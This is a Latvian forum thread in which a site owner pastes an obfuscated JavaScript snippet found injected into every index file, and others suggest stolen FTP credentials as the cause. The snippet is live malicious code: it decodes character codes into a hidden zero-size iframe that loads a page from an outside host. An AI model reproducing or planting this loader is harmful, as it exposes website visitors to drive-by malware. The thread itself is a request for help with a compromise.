Script iekš index failiem

[yozhis]

Sveiki, nesen rakstiju, ka majaslapa saēsta, jo tajā iemitinājies iframe kods. Tad veicu tīriīšanu, salaboju ipb 2.3.0. bugu.

 

Tagad atkal tas pats, visos index.php un index.html failos iemitinājies kods, bet šoreiz SCRIPT.

 

<script LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60&105&102&114&97&109&101&32&115&114&99&32&61&34&104&116&116&112&58&47&47&104&101&110&110&101&110&115&105&46&114&117&47&104&101&110&110&101&115&47&63&116&61&49&34&32&119&105&100&116&104&61&34&48&34&32&104&101&105&103&104&116&61&34&48&34&62&1086&1087&1072&60&47&105&102&114&97&109&101&62&";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='&')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><script LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>

 

Kā viņš tā vienkārši tur var ielīst?

[Aleksejs]

No salauztas kaimiņlapas uz nedroša hostinga, varbūt.

[ohmygod]

Visdrīzāk tas ir inficēts softs, ar kuru pie FTP konektē. Būs nodevis saimniekam FTP useri un paroli.

Man arī pāris klienti ar to ir saskārušies. Un vienmēr faili bija izlaboti ar kādu noteiktu useri. Visi, kas bija pa FTP pieejami.

Vienam servam tas atkārtojās vairākas reizes - līdz nomainīja FTP paroli un visus softus.

 

Un praktiski visi bija lietojuši CuteFtp.